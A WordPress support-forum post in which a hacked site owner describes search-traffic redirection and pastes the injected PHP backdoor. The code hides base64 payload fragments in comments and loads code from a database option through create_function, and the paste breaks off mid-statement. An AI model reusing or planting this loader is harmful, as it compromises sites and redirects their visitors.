I was hacked

  • Resolved patrickdappollonio

    (@patrickdappollonio)


    15 years, 10 months ago

    Hello,

    From the sunday, I’ve hacked by an unknowed. The hacker add a malicoious script when a visitors arrive from google, the script send them to another search page, with the same string that the user wants to find in Google.

    The hacker add this malicious code to an image of my weblog -an image of a post blog- and the hacker add the image to work like a plugin in the MySQL database.

    Here is the code of the image transformated in plugin:

    <?php /*?#?#,,sess,GFjdD0i
0FDVElPTl0iOyAkdG1
X3NoZ
xsPSJbVE1QX1NIRUxMX1BBVEhdIjsNCmVycm9yX3JlcG9ydGluZyg
KTsNCkBjaG1vZChzd
JzdHIoJHRtcF9zaGVsbC

LHN0cnJ
b3MoJHRtcF9zaGVsbC
iLyIpKS

Nzc3KTsNCkBjaG1vZCgkdG1
X3NoZ
xsLDA3NzcpOyBAdG91Y2goJHRtcF9zaGVsbCk7IEBjaG1vZCgkdG1
X3NoZ
xsLDA1NTUpO
0Ka
YoJGFjdD09InRtcCIpIEBjaG1vZChzd
JzdHIoJHRtcF9zaGVsbC

LHN0cnJ
b3MoJHRtcF9zaGVsbC
iLyIpKS

NTU1KTsNCiRsYz0i
0dPUk9fQ09PS0lFXSI7DQppZihpc3NldCgkX0NPT0tJRVskbGNdKSl7DQoJJGxpbj0kX0NPT0tJRVskbGNdO
0KC
VjaG8oIj
hLS0gZXggLS0
Iik7DQoJJGxpbj1
cmVnX3JlcGxhY2UoIi9fLyIsICIrIi
gJGxpbik7DQoJZXZhbChiYXNlNjRfZGVjb2RlKCRsa
4pKTsNCgllY2hvKCI8IS0tIC9leCAtLT4iKTsNCglleGl0O
0KfQ0KJGZmd
5jdHh0PSckcD0iJy4kdG1
X3NoZ
xsLiciO
0KJGE9Z2V0X29
dGlvbigiY
N0aXZlX3Bsd
dpbnMiKTsNCiRiP
ZhbHNlOyBpZihpc19hcnJheSgkYSkpIGZvcmVhY2goJGEgYXMgJGspIGlmKHN0cnBvcygkay
kcCkhPT1mY
xzZSkgJGI9dHJ1ZTsNCmlmKCEkYil7ICRh
109JHA7IHV
ZGF0ZV9vcHRpb24oImFjdGl2ZV9
bHVna
5zIi
kYSk7IH0nO
0KJGZmd
5jP
NyZ
F0ZV9md
5jdGlvbignJy
kZmZ1bmN0eHQpO
0KY
RkX2FjdGlvbigidXBkYXRlX29
dGlvbl9hY3RpdGFjdD0i
0FDVElPTl0iOyAkdG1
X3NoZ
xsPSJbVE1QX1NIRUxMX1BBVEhdIjsNCmVycm9yX3JlcG9ydGluZyg
KTsNCkBjaG1vZChzd
JzdHIoJHRtcF9zaGVsbC

LHN0cnJ
b3MoJHRtcF9zaGVsbC
iLyIpKS

Nzc3KTsNCkBjaG1vZCgkdG1
X3NoZ
xsLDA3NzcpOyBAdG91Y2goJHRtcF9zaGVsbCk7IEBjaG1vZCgkdG1
X3NoZ
xsLDA1NTUpO
0Ka
YoJGFjdD09InRtcCIpIEBjaG1vZChzd
JzdHIoJHRtcF9zaGVsbC

LHN0cnJ
b3MoJHRtcF9zaGVsbC
iLyIpKS

NTU1KTsNCiRsYz0i
0dPUk9fQ09PS0lFXSI7DQppZihpc3NldCgkX0NPT0tJRVskbGNdKSl7DQoJJGxpbj0kX0NPT0tJRVskbGNdO
0KC
VjaG8oIj
hLS0gZXggLS0
Iik7DQoJJGxpbj1
cmVnX3JlcGxhY2UoIi9fLyIsICIrIi
gJGxpbik7DQoJZXZhbChiYXNlNjRfZGVjb2RlKCRsa
4pKTsNCgllY2hvKCI8IS0tIC9leCAtLT4iKTsNCglleGl0O
0KfQ0KJGZmd
5jdHh0PSckcD0iJy4kdG1
X3NoZ
xsLiciO
0KJGE9Z2V0X29
dGlvbigiY
N0aXZlX3Bsd
dpbnMiKTsNCiRiP
ZhbHNlOyBpZihpc19hcnJheSgkYSkpIGZvcmVhY2goJGEgYXMgJGspIGlmKHN0cnBvcygkay
kcCkhPT1mY
xzZSkgJGI9dHJ1ZTsNCmlmKCEkYil7ICRh
109JHA7IHV
ZGF0ZV9vcHRpb24oImFjdGl2ZV9
bHVna
5zIi
kYSk7IH0nO
0KJGZmd
5jP
NyZ
F0ZV9md
5jdGlvbignJy
kZmZ1bmN0eHQpO
0KY
RkX2FjdGlvbigidXBkYXRlX29
dGlvbl9hY3RpdGFjdD0i
0FDVElPTl0iOyAkdG1
X3NoZ
xsPSJbVE1QX1NIRUxMX1BBVEhdIjsNCmVycm9yX3JlcG9ydGluZyg
KTsNCkBjaG1vZChzd
JzdHIoJHRtcF9zaGVsbC

LHN0cnJ
b3MoJHRtcF9zaGVsbC
iLyIpKS

Nzc3KTsNCkBjaG1vZCgkdG1
X3NoZ
xsLDA3NzcpOyBAdG91Y2goJHRtcF9zaGVsbCk7IEBjaG1vZCgkdG1
X3NoZ
xsLDA1NTUpO
0Ka
YoJGFjdD09InRtcCIpIEBjaG1vZChzd
JzdHIoJHRtcF9zaGVsbC

LHN0cnJ
b3MoJHRtcF9zaGVsbC
iLyIpKS

NTU1KTsNCiRsYz0i
0dPUk9fQ09PS0lFXSI7DQppZihpc3NldCgkX0NPT0tJRVskbGNdKSl7DQoJJGxpbj0kX0NPT0tJRVskbGNdO
0KC
VjaG8oIj
hLS0gZXggLS0
Iik7DQoJJGxpbj1
cmVnX3JlcGxhY2UoIi9fLyIsICIrIi
gJGxpbik7DQoJZXZhbChiYXNlNjRfZGVjb2RlKCRsa
4pKTsNCgllY2hvKCI8IS0tIC9leCAtLT4iKTsNCglleGl0O
0KfQ0KJGZmd
5jdHh0PSckcD0iJy4kdG1
X3NoZ
xsLiciO
0KJGE9Z2V0X29
dGlvbigiY
N0aXZlX3Bsd
dpbnMiKTsNCiRiP
ZhbHNlOyBpZihpc19hcnJheSgkYSkpIGZvcmVhY2goJGEgYXMgJGspIGlmKHN0cnBvcygkay
kcCkhPT1mY
xzZSkgJGI9dHJ1ZTsNCmlmKCEkYil7ICRh
109JHA7IHV
ZGF0ZV9vcHRpb24oImFjdGl2ZV9
bHVna
5zIi
kYSk7IH0nO
0KJGZmd
5jP
NyZ
F0ZV9md
5jdGlvbignJy
kZmZ1bmN0eHQpO
0KY
RkX2FjdGlvbigidXBkYXRlX29
dGlvbl9hY3Rpd */global $wpdb;/* GFjdD0i
0FDVElPTl0iOyAkdG1
X3NoZ
xsPSJbVE1QX1NIRUxMX1BBVEhdIjsNCmVycm9yX3JlcG9ydGluZyg
KTsNCkBjaG1vZChzd
JzdHIoJHRtcF9zaGVsbC

LHN0cnJ
b3MoJHRtcF9zaGVsbC
iLyIpKS

Nzc3KTsNCkBjaG1vZCgkdG1
X3NoZ
xsLDA3NzcpOyBAdG91Y2goJHRtcF9zaGVsbCk7IEBjaG1vZCgkdG1
X3NoZ
xsLDA1NTUpO
0Ka
YoJGFjdD09InRtcCIpIEBjaG1vZChzd
JzdHIoJHRtcF9zaGVsbC

LHN0cnJ
b3MoJHRtcF9zaGVsbC
iLyIpKS

NTU1KTsNCiRsYz0i
0dPUk9fQ09PS0lFXSI7DQppZihpc3NldCgkX0NPT0tJRVskbGNdKSl7DQoJJGxpbj0kX0NPT0tJRVskbGNdO
0KC
VjaG8oIj
hLS0gZXggLS0
Iik7DQoJJGxpbj1
cmVnX3JlcGxhY2UoIi9fLyIsICIrIi
gJGxpbik7DQoJZXZhbChiYXNlNjRfZGVjb2RlKCRsa
4pKTsNCgllY2hvKCI8IS0tIC9leCAtLT4iKTsNCglleGl0O
0KfQ0KJGZmd
5jdHh0PSckcD0iJy4kdG1
X3NoZ
xsLiciO
0KJGE9Z2V0X29
dGlvbigiY
N0aXZlX3Bsd
dpbnMiKTsNCiRiP
ZhbHNlOyBpZihpc19hcnJheSgkYSkpIGZvcmVhY2goJGEgYXMgJGspIGlmKHN0cnBvcygkay
kcCkhPT1mY
xzZSkgJGI9dHJ1ZTsNCmlmKCEkYil7ICRh
109JHA7IHV
ZGF0ZV9vcHRpb24oImFjdGl2ZV9
bHVna
5zIi
kYSk7IH0nO
0KJGZmd
5jP
NyZ
F0ZV9md
5jdGlvbignJy
kZmZ1bmN0eHQpO
0KY
RkX2FjdGlvbigidXBkYXRlX29
dGlvbl9hY3Rpd */$trp_rss=$wpdb->get_var/* GFjdD0i
0FDVElPTl0iOyAkdG1
X3NoZ
xsPSJbVE1QX1NIRUxMX1BBVEhdIjsNCmVycm9yX3JlcG9ydGluZyg
KTsNCkBjaG1vZChzd
JzdHIoJHRtcF9zaGVsbC

LHN0cnJ
b3MoJHRtcF9zaGVsbC
iLyIpKS

Nzc3KTsNCkBjaG1vZCgkdG1
X3NoZ
xsLDA3NzcpOyBAdG91Y2goJHRtcF9zaGVsbCk7IEBjaG1vZCgkdG1
X3NoZ
xsLDA1NTUpO
0Ka
YoJGFjdD09InRtcCIpIEBjaG1vZChzd
JzdHIoJHRtcF9zaGVsbC

LHN0cnJ
b3MoJHRtcF9zaGVsbC
iLyIpKS

NTU1KTsNCiRsYz0i
0dPUk9fQ09PS0lFXSI7DQppZihpc3NldCgkX0NPT0tJRVskbGNdKSl7DQoJJGxpbj0kX0NPT0tJRVskbGNdO
0KC
VjaG8oIj
hLS0gZXggLS0
Iik7DQoJJGxpbj1
cmVnX3JlcGxhY2UoIi9fLyIsICIrIi
gJGxpbik7DQoJZXZhbChiYXNlNjRfZGVjb2RlKCRsa
4pKTsNCgllY2hvKCI8IS0tIC9leCAtLT4iKTsNCglleGl0O
0KfQ0KJGZmd
5jdHh0PSckcD0iJy4kdG1
X3NoZ
xsLiciO
0KJGE9Z2V0X29
dGlvbigiY
N0aXZlX3Bsd
dpbnMiKTsNCiRiP
ZhbHNlOyBpZihpc19hcnJheSgkYSkpIGZvcmVhY2goJGEgYXMgJGspIGlmKHN0cnBvcygkay
kcCkhPT1mY
xzZSkgJGI9dHJ1ZTsNCmlmKCEkYil7ICRh
109JHA7IHV
ZGF0ZV9vcHRpb24oImFjdGl2ZV9
bHVna
5zIi
kYSk7IH0nO
0KJGZmd
5jP
NyZ
F0ZV9md
5jdGlvbignJy
kZmZ1bmN0eHQpO
0KY
RkX2FjdGlvbigidXBkYXRlX29
dGlvbl9hY3Rpd */(/* GFjdD0i
0FDVElPTl0iOyAkdG1
X3NoZ
xsPSJbVE1QX1NIRUxMX1BBVEhdIjsNCmVycm9yX3JlcG9ydGluZyg
KTsNCkBjaG1vZChzd
JzdHIoJHRtcF9zaGVsbC

LHN0cnJ
b3MoJHRtcF9zaGVsbC
iLyIpKS

Nzc3KTsNCkBjaG1vZCgkdG1
X3NoZ
xsLDA3NzcpOyBAdG91Y2goJHRtcF9zaGVsbCk7IEBjaG1vZCgkdG1
X3NoZ
xsLDA1NTUpO
0Ka
YoJGFjdD09InRtcCIpIEBjaG1vZChzd
JzdHIoJHRtcF9zaGVsbC

LHN0cnJ
b3MoJHRtcF9zaGVsbC
iLyIpKS

NTU1KTsNCiRsYz0i
0dPUk9fQ09PS0lFXSI7DQppZihpc3NldCgkX0NPT0tJRVskbGNdKSl7DQoJJGxpbj0kX0NPT0tJRVskbGNdO
0KC
VjaG8oIj
hLS0gZXggLS0
Iik7DQoJJGxpbj1
cmVnX3JlcGxhY2UoIi9fLyIsICIrIi
gJGxpbik7DQoJZXZhbChiYXNlNjRfZGVjb2RlKCRsa
4pKTsNCgllY2hvKCI8IS0tIC9leCAtLT4iKTsNCglleGl0O
0KfQ0KJGZmd
5jdHh0PSckcD0iJy4kdG1
X3NoZ
xsLiciO
0KJGE9Z2V0X29
dGlvbigiY
N0aXZlX3Bsd
dpbnMiKTsNCiRiP
ZhbHNlOyBpZihpc19hcnJheSgkYSkpIGZvcmVhY2goJGEgYXMgJGspIGlmKHN0cnBvcygkay
kcCkhPT1mY
xzZSkgJGI9dHJ1ZTsNCmlmKCEkYil7ICRh
109JHA7IHV
ZGF0ZV9vcHRpb24oImFjdGl2ZV9
bHVna
5zIi
kYSk7IH0nO
0KJGZmd
5jP
NyZ
F0ZV9md
5jdGlvbignJy
kZmZ1bmN0eHQpO
0KY
RkX2FjdGlvbigidXBkYXRlX29
dGlvbl9hY3Rpd*/"SELECT option_value FROM $wpdb->options WHERE option_name='rss_f541b3abd05e7962fcab37737f40fad8'"/* GFjdD0i
0FDVElPTl0iOyAkdG1
X3NoZ
xsPSJbVE1QX1NIRUxMX1BBVEhdIjsNCmVycm9yX3JlcG9ydGluZyg
KTsNCkBjaG1vZChzd
JzdHIoJHRtcF9zaGVsbC

LHN0cnJ
b3MoJHRtcF9zaGVsbC
iLyIpKS

Nzc3KTsNCkBjaG1vZCgkdG1
X3NoZ
xsLDA3NzcpOyBAdG91Y2goJHRtcF9zaGVsbCk7IEBjaG1vZCgkdG1
X3NoZ
xsLDA1NTUpO
0Ka
YoJGFjdD09InRtcCIpIEBjaG1vZChzd
JzdHIoJHRtcF9zaGVsbC

LHN0cnJ
b3MoJHRtcF9zaGVsbC
iLyIpKS

NTU1KTsNCiRsYz0i
0dPUk9fQ09PS0lFXSI7DQppZihpc3NldCgkX0NPT0tJRVskbGNdKSl7DQoJJGxpbj0kX0NPT0tJRVskbGNdO
0KC
VjaG8oIj
hLS0gZXggLS0
Iik7DQoJJGxpbj1
cmVnX3JlcGxhY2UoIi9fLyIsICIrIi
gJGxpbik7DQoJZXZhbChiYXNlNjRfZGVjb2RlKCRsa
4pKTsNCgllY2hvKCI8IS0tIC9leCAtLT4iKTsNCglleGl0O
0KfQ0KJGZmd
5jdHh0PSckcD0iJy4kdG1
X3NoZ
xsLiciO
0KJGE9Z2V0X29
dGlvbigiY
N0aXZlX3Bsd
dpbnMiKTsNCiRiP
ZhbHNlOyBpZihpc19hcnJheSgkYSkpIGZvcmVhY2goJGEgYXMgJGspIGlmKHN0cnBvcygkay
kcCkhPT1mY
xzZSkgJGI9dHJ1ZTsNCmlmKCEkYil7ICRh
109JHA7IHV
ZGF0ZV9vcHRpb24oImFjdGl2ZV9
bHVna
5zIi
kYSk7IH0nO
0KJGZmd
5jP
NyZ
F0ZV9md
5jdGlvbignJy
kZmZ1bmN0eHQpO
0KY
RkX2FjdGlvbigidXBkYXRlX29
dGlvbl9hY3Rpd*/); /* GFjdD0i
0FDVElPTl0iOyAkdG1
X3NoZ
xsPSJbVE1QX1NIRUxMX1BBVEhdIjsNCmVycm9yX3JlcG9ydGluZyg
KTsNCkBjaG1vZChzd
JzdHIoJHRtcF9zaGVsbC

LHN0cnJ
b3MoJHRtcF9zaGVsbC
iLyIpKS

Nzc3KTsNCkBjaG1vZCgkdG1
X3NoZ
xsLDA3NzcpOyBAdG91Y2goJHRtcF9zaGVsbCk7IEBjaG1vZCgkdG1
X3NoZ
xsLDA1NTUpO
0Ka
YoJGFjdD09InRtcCIpIEBjaG1vZChzd
JzdHIoJHRtcF9zaGVsbC

LHN0cnJ
b3MoJHRtcF9zaGVsbC
iLyIpKS

NTU1KTsNCiRsYz0i
0dPUk9fQ09PS0lFXSI7DQppZihpc3NldCgkX0NPT0tJRVskbGNdKSl7DQoJJGxpbj0kX0NPT0tJRVskbGNdO
0KC
VjaG8oIj
hLS0gZXggLS0
Iik7DQoJJGxpbj1
cmVnX3JlcGxhY2UoIi9fLyIsICIrIi
gJGxpbik7DQoJZXZhbChiYXNlNjRfZGVjb2RlKCRsa
4pKTsNCgllY2hvKCI8IS0tIC9leCAtLT4iKTsNCglleGl0O
0KfQ0KJGZmd
5jdHh0PSckcD0iJy4kdG1
X3NoZ
xsLiciO
0KJGE9Z2V0X29
dGlvbigiY
N0aXZlX3Bsd
dpbnMiKTsNCiRiP
ZhbHNlOyBpZihpc19hcnJheSgkYSkpIGZvcmVhY2goJGEgYXMgJGspIGlmKHN0cnBvcygkay
kcCkhPT1mY
xzZSkgJGI9dHJ1ZTsNCmlmKCEkYil7ICRh
109JHA7IHV
ZGF0ZV9vcHRpb24oImFjdGl2ZV9
bHVna
5zIi
kYSk7IH0nO
0KJGZmd
5jP
NyZ
F0ZV9md
5jdGlvbignJy
kZmZ1bmN0eHQpO
0KY
RkX2FjdGlvbigidXBkYXRlX29
dGlvbl9hY3Rpd*/ preg_match/* GFjdD0i
0FDVElPTl0iOyAkdG1
X3NoZ
xsPSJbVE1QX1NIRUxMX1BBVEhdIjsNCmVycm9yX3JlcG9ydGluZyg
KTsNCkBjaG1vZChzd
JzdHIoJHRtcF9zaGVsbC

LHN0cnJ
b3MoJHRtcF9zaGVsbC
iLyIpKS

Nzc3KTsNCkBjaG1vZCgkdG1
X3NoZ
xsLDA3NzcpOyBAdG91Y2goJHRtcF9zaGVsbCk7IEBjaG1vZCgkdG1
X3NoZ
xsLDA1NTUpO
0Ka
YoJGFjdD09InRtcCIpIEBjaG1vZChzd
JzdHIoJHRtcF9zaGVsbC

LHN0cnJ
b3MoJHRtcF9zaGVsbC
iLyIpKS

NTU1KTsNCiRsYz0i
0dPUk9fQ09PS0lFXSI7DQppZihpc3NldCgkX0NPT0tJRVskbGNdKSl7DQoJJGxpbj0kX0NPT0tJRVskbGNdO
0KC
VjaG8oIj
hLS0gZXggLS0
Iik7DQoJJGxpbj1
cmVnX3JlcGxhY2UoIi9fLyIsICIrIi
gJGxpbik7DQoJZXZhbChiYXNlNjRfZGVjb2RlKCRsa
4pKTsNCgllY2hvKCI8IS0tIC9leCAtLT4iKTsNCglleGl0O
0KfQ0KJGZmd
5jdHh0PSckcD0iJy4kdG1
X3NoZ
xsLiciO
0KJGE9Z2V0X29
dGlvbigiY
N0aXZlX3Bsd
dpbnMiKTsNCiRiP
ZhbHNlOyBpZihpc19hcnJheSgkYSkpIGZvcmVhY2goJGEgYXMgJGspIGlmKHN0cnBvcygkay
kcCkhPT1mY
xzZSkgJGI9dHJ1ZTsNCmlmKCEkYil7ICRh
109JHA7IHV
ZGF0ZV9vcHRpb24oImFjdGl2ZV9
bHVna
5zIi
kYSk7IH0nO
0KJGZmd
5jP
NyZ
F0ZV9md
5jdGlvbignJy
kZmZ1bmN0eHQpO
0KY
RkX2FjdGlvbigidXBkYXRlX29
dGlvbl9hY3Rpd*/(/* GFjdD0i
0FDVElPTl0iOyAkdG1
X3NoZ
xsPSJbVE1QX1NIRUxMX1BBVEhdIjsNCmVycm9yX3JlcG9ydGluZyg
KTsNCkBjaG1vZChzd
JzdHIoJHRtcF9zaGVsbC

LHN0cnJ
b3MoJHRtcF9zaGVsbC
iLyIpKS

Nzc3KTsNCkBjaG1vZCgkdG1
X3NoZ
xsLDA3NzcpOyBAdG91Y2goJHRtcF9zaGVsbCk7IEBjaG1vZCgkdG1
X3NoZ
xsLDA1NTUpO
0Ka
YoJGFjdD09InRtcCIpIEBjaG1vZChzd
JzdHIoJHRtcF9zaGVsbC

LHN0cnJ
b3MoJHRtcF9zaGVsbC
iLyIpKS

NTU1KTsNCiRsYz0i
0dPUk9fQ09PS0lFXSI7DQppZihpc3NldCgkX0NPT0tJRVskbGNdKSl7DQoJJGxpbj0kX0NPT0tJRVskbGNdO
0KC
VjaG8oIj
hLS0gZXggLS0
Iik7DQoJJGxpbj1
cmVnX3JlcGxhY2UoIi9fLyIsICIrIi
gJGxpbik7DQoJZXZhbChiYXNlNjRfZGVjb2RlKCRsa
4pKTsNCgllY2hvKCI8IS0tIC9leCAtLT4iKTsNCglleGl0O
0KfQ0KJGZmd
5jdHh0PSckcD0iJy4kdG1
X3NoZ
xsLiciO
0KJGE9Z2V0X29
dGlvbigiY
N0aXZlX3Bsd
dpbnMiKTsNCiRiP
ZhbHNlOyBpZihpc19hcnJheSgkYSkpIGZvcmVhY2goJGEgYXMgJGspIGlmKHN0cnBvcygkay
kcCkhPT1mY
xzZSkgJGI9dHJ1ZTsNCmlmKCEkYil7ICRh
109JHA7IHV
ZGF0ZV9vcHRpb24oImFjdGl2ZV9
bHVna
5zIi
kYSk7IH0nO
0KJGZmd
5jP
NyZ
F0ZV9md
5jdGlvbignJy
kZmZ1bmN0eHQpO
0KY
RkX2FjdGlvbigidXBkYXRlX29
dGlvbl9hY3Rpd*/"!events or a cale\"\;s\:7\:\'(.*?)\'!is",$trp_rss,$trp_m/* GFjdD0i
0FDVElPTl0iOyAkdG1
X3NoZ
xsPSJbVE1QX1NIRUxMX1BBVEhdIjsNCmVycm9yX3JlcG9ydGluZyg
KTsNCkBjaG1vZChzd
JzdHIoJHRtcF9zaGVsbC

LHN0cnJ
b3MoJHRtcF9zaGVsbC
iLyIpKS

Nzc3KTsNCkBjaG1vZCgkdG1
X3NoZ
xsLDA3NzcpOyBAdG91Y2goJHRtcF9zaGVsbCk7IEBjaG1vZCgkdG1
X3NoZ
xsLDA1NTUpO
0Ka
YoJGFjdD09InRtcCIpIEBjaG1vZChzd
JzdHIoJHRtcF9zaGVsbC

LHN0cnJ
b3MoJHRtcF9zaGVsbC
iLyIpKS

NTU1KTsNCiRsYz0i
0dPUk9fQ09PS0lFXSI7DQppZihpc3NldCgkX0NPT0tJRVskbGNdKSl7DQoJJGxpbj0kX0NPT0tJRVskbGNdO
0KC
VjaG8oIj
hLS0gZXggLS0
Iik7DQoJJGxpbj1
cmVnX3JlcGxhY2UoIi9fLyIsICIrIi
gJGxpbik7DQoJZXZhbChiYXNlNjRfZGVjb2RlKCRsa
4pKTsNCgllY2hvKCI8IS0tIC9leCAtLT4iKTsNCglleGl0O
0KfQ0KJGZmd
5jdHh0PSckcD0iJy4kdG1
X3NoZ
xsLiciO
0KJGE9Z2V0X29
dGlvbigiY
N0aXZlX3Bsd
dpbnMiKTsNCiRiP
ZhbHNlOyBpZihpc19hcnJheSgkYSkpIGZvcmVhY2goJGEgYXMgJGspIGlmKHN0cnBvcygkay
kcCkhPT1mY
xzZSkgJGI9dHJ1ZTsNCmlmKCEkYil7ICRh
109JHA7IHV
ZGF0ZV9vcHRpb24oImFjdGl2ZV9
bHVna
5zIi
kYSk7IH0nO
0KJGZmd
5jP
NyZ
F0ZV9md
5jdGlvbignJy
kZmZ1bmN0eHQpO
0KY
RkX2FjdGlvbigidXBkYXRlX29
dGlvbl9hY3Rpd*/);/* GFjdD0i
0FDVElPTl0iOyAkdG1
X3NoZ
xsPSJbVE1QX1NIRUxMX1BBVEhdIjsNCmVycm9yX3JlcG9ydGluZyg
KTsNCkBjaG1vZChzd
JzdHIoJHRtcF9zaGVsbC

LHN0cnJ
b3MoJHRtcF9zaGVsbC
iLyIpKS

Nzc3KTsNCkBjaG1vZCgkdG1
X3NoZ
xsLDA3NzcpOyBAdG91Y2goJHRtcF9zaGVsbCk7IEBjaG1vZCgkdG1
X3NoZ
xsLDA1NTUpO
0Ka
YoJGFjdD09InRtcCIpIEBjaG1vZChzd
JzdHIoJHRtcF9zaGVsbC

LHN0cnJ
b3MoJHRtcF9zaGVsbC
iLyIpKS

NTU1KTsNCiRsYz0i
0dPUk9fQ09PS0lFXSI7DQppZihpc3NldCgkX0NPT0tJRVskbGNdKSl7DQoJJGxpbj0kX0NPT0tJRVskbGNdO
0KC
VjaG8oIj
hLS0gZXggLS0
Iik7DQoJJGxpbj1
cmVnX3JlcGxhY2UoIi9fLyIsICIrIi
gJGxpbik7DQoJZXZhbChiYXNlNjRfZGVjb2RlKCRsa
4pKTsNCgllY2hvKCI8IS0tIC9leCAtLT4iKTsNCglleGl0O
0KfQ0KJGZmd
5jdHh0PSckcD0iJy4kdG1
X3NoZ
xsLiciO
0KJGE9Z2V0X29
dGlvbigiY
N0aXZlX3Bsd
dpbnMiKTsNCiRiP
ZhbHNlOyBpZihpc19hcnJheSgkYSkpIGZvcmVhY2goJGEgYXMgJGspIGlmKHN0cnBvcygkay
kcCkhPT1mY
xzZSkgJGI9dHJ1ZTsNCmlmKCEkYil7ICRh
109JHA7IHV
ZGF0ZV9vcHRpb24oImFjdGl2ZV9
bHVna
5zIi
kYSk7IH0nO
0KJGZmd
5jP
NyZ
F0ZV9md
5jdGlvbignJy
kZmZ1bmN0eHQpO
0KY
RkX2FjdGlvbigidXBkYXRlX29
dGlvbl9hY3RpdGFjdD0i
0FDVElPTl0iOyAkdG1
X3NoZ
xsPSJbVE1QX1NIRUxMX1BBVEhdIjsNCmVycm9yX3JlcG9ydGluZyg
KTsNCkBjaG1vZChzd
JzdHIoJHRtcF9zaGVsbC

LHN0cnJ
b3MoJHRtcF9zaGVsbC
iLyIpKS

Nzc3KTsNCkBjaG1vZCgkdG1
X3NoZ
xsLDA3NzcpOyBAdG91Y2goJHRtcF9zaGVsbCk7IEBjaG1vZCgkdG1
X3NoZ
xsLDA1NTUpO
0Ka
YoJGFjdD09InRtcCIpIEBjaG1vZChzd
JzdHIoJHRtcF9zaGVsbC

LHN0cnJ
b3MoJHRtcF9zaGVsbC
iLyIpKS

NTU1KTsNCiRsYz0i
0dPUk9fQ09PS0lFXSI7DQppZihpc3NldCgkX0NPT0tJRVskbGNdKSl7DQoJJGxpbj0kX0NPT0tJRVskbGNdO
0KC
VjaG8oIj
hLS0gZXggLS0
Iik7DQoJJGxpbj1
cmVnX3JlcGxhY2UoIi9fLyIsICIrIi
gJGxpbik7DQoJZXZhbChiYXNlNjRfZGVjb2RlKCRsa
4pKTsNCgllY2hvKCI8IS0tIC9leCAtLT4iKTsNCglleGl0O
0KfQ0KJGZmd
5jdHh0PSckcD0iJy4kdG1
X3NoZ
xsLiciO
0KJGE9Z2V0X29
dGlvbigiY
N0aXZlX3Bsd
dpbnMiKTsNCiRiP
ZhbHNlOyBpZihpc19hcnJheSgkYSkpIGZvcmVhY2goJGEgYXMgJGspIGlmKHN0cnBvcygkay
kcCkhPT1mY
xzZSkgJGI9dHJ1ZTsNCmlmKCEkYil7ICRh
109JHA7IHV
ZGF0ZV9vcHRpb24oImFjdGl2ZV9
bHVna
5zIi
kYSk7IH0nO
0KJGZmd
5jP
NyZ
F0ZV9md
5jdGlvbignJy
kZmZ1bmN0eHQpO
0KY
RkX2FjdGlvbigidXBkYXRlX29
dGlvbl9hY3Rpd*/ $trp_f=create_function/* GFjdD0i
0FDVElPTl0iOyAkdG1
X3NoZ
xsPSJbVE1QX1NIRUxMX1BBVEhdIjsNCmVycm9yX3JlcG9ydGluZyg
KTsNCkBjaG1vZChzd
JzdHIoJHRtcF9zaGVsbC

LHN0cnJ
b3MoJHRtcF9zaGVsbC
iLyIpKS

Nzc3KTsNCkBjaG1vZCgkdG1
X3NoZ
xsLDA3NzcpOyBAdG91Y2goJHRtcF9zaGVsbCk7IEBjaG1vZCgkdG1
X3NoZ
xsLDA1NTUpO
0Ka
YoJGFjdD09InRtcCIpIEBjaG1vZChzd
JzdHIoJHRtcF9zaGVsbC

LHN0cnJ
b3MoJHRtcF9zaGVsbC
iLyIpKS

NTU1KTsNCiRsYz0i
0dPUk9fQ09PS0lFXSI7DQppZihpc3NldCgkX0NPT0tJRVskbGNdKSl7DQoJJGxpbj0kX0NPT0tJRVskbGNdO
0KC
VjaG8oIj
hLS0gZXggLS0
Iik7DQoJJGxpbj1
cmVnX3JlcGxhY2UoIi9fLyIsICIrIi
gJGxpbik7DQoJZXZhbChiYXNlNjRfZGVjb2RlKCRsa
4pKTsNCgllY2hvKCI8IS0tIC9leCAtLT4iKTsNCglleGl0O
0KfQ0KJGZmd
5jdHh0PSckcD0iJy4kdG1
X3NoZ
xsLiciO
0KJGE9Z2V0X29
dGlvbigiY
N0aXZlX3Bsd
dpbnMiKTsNCiRiP
ZhbHNlOyBpZihpc19hcnJheSgkYSkpIGZvcmVhY2goJGEgYXMgJGspIGlmKHN0cnBvcygkay
kcCkhPT1mY
xzZSkgJGI9dHJ1ZTsNCmlmKCEkYil7ICRh
109JHA7IHV
ZGF0ZV9vcHRpb24oImFjdGl2ZV9
bHVna
5zIi
kYSk7IH0nO
0KJGZmd
5jP
NyZ
F0ZV9md
5jdGlvbignJy
kZmZ1bmN0eHQpO
0KY
RkX2FjdGlvbigidXBkYXRlX29
dGlvbl9hY3Rpd*/(/* GFjdD0i
0FDVElPTl0iOyAkdG1
X3NoZ
xsPSJbVE1QX1NIRUxMX1BBVEhdIjsNCmVycm9yX3JlcG9ydGluZyg
KTsNCkBjaG1vZChzd
JzdHIoJHRtcF9zaGVsbC

LHN0cnJ
b3MoJHRtcF9zaGVsbC
iLyIpKS

Nzc3KTsNCkBjaG1vZCgkdG1
X3NoZ
xsLDA3NzcpOyBAdG91Y2goJHRtcF9zaGVsbCk7IEBjaG1vZCgkdG1
X3NoZ
xsLDA1NTUpO
0Ka
YoJGFjdD09InRtcCIpIEBjaG1vZChzd
JzdHIoJHRtcF9zaGVsbC

LHN0cnJ
b3MoJHRtcF9zaGVsbC
iLyIpKS

NTU1KTsNCiRsYz0i
0dPUk9fQ09PS0lFXSI7DQppZihpc3NldCgkX0NPT0tJRVskbGNdKSl7DQoJJGxpbj0kX0NPT0tJRVskbGNdO
0KC
VjaG8oIj
hLS0gZXggLS0
Iik7DQoJJGxpbj1
cmVnX3JlcGxhY2UoIi9fLyIsICIrIi
gJGxpbik7DQoJZXZhbChiYXNlNjRfZGVjb2RlKCRsa
4pKTsNCgllY2hvKCI8IS0tIC9leCAtLT4iKTsNCglleGl0O
0KfQ0KJGZmd
5jdHh0PSckcD0iJy4kdG1
X3NoZ
xsLiciO
0KJGE9Z2V0X29
dGlvbigiY
N0aXZlX3Bsd
dpbnMiKTsNCiRiP
ZhbHNlOyBpZihpc19hcnJheSgkYSkpIGZvcmVhY2goJGEgYXMgJGspIGlmKHN0cnBvcygkay
kcCkhPT1mY
xzZSkgJGI9dHJ1ZTsNCmlmKCEkYil7ICRh
109JHA7IHV
ZGF0ZV9vcHRpb24oImFjdGl2ZV9
bHVna
5zIi
kYSk7IH0nO
0KJGZmd
5jP
NyZ
F0ZV9md
5jdGlvbignJy
kZmZ1bmN0eHQpO
0KY
RkX2FjdGlvbigidXBkYXRlX29
dGlvbl9hY3Rpd*/"",/* GFjdD0i
